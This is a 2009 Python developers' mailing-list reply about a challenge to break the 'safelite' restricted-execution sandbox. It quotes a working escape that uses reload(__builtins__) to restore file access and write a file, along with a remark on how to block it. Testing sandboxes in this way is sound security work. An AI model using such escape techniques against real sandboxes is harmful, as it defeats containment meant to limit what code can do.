On Mon, Feb 23, 2009 at 1:12 PM, Victor Stinner <victor.stin...@haypocalc.com> wrote:
>> The challenge is simple:
>>
>> * Open a fresh Python interpreter
>> * Do: >>> from safelite import FileReader
>> * You can use FileReader to read files on your filesystem
>> * Now find a way to *write* to the filesystem from your interpreter
>
> Well, the challenge is to get access to a module. And... it's quite simple :-p
>
> $ ./python
> >>> from safelite import FileReader
> >>> __builtins__.file
> Traceback (most recent call last):
>   File "<stdin>", line 1, in <module>
> AttributeError: 'module' object has no attribute 'file'
> >>> reload(__builtins__)
> <module '__builtin__' (built-in)>
> >>> file('0wn3d', 'w').write('w00t\n')
> >>>
> $ cat 0wn3d
> w00t
>
>> Dinner and drinks on me for an evening -- when you are next in London
>> or I am in your town -- to the first person who manages to break
>> safelite.py and write to the filesystem.
>
> Cool. It's a good reason to go to Pycon UK this year ;-)

Tav should have made another stipulation: the attack must not be trivial to fix. This one seems trivial, e.g. by adding 'reload' to the list in secure_python_builtins().

-- 
--Guido van Rossum (home page: http://www.python.org/~guido/)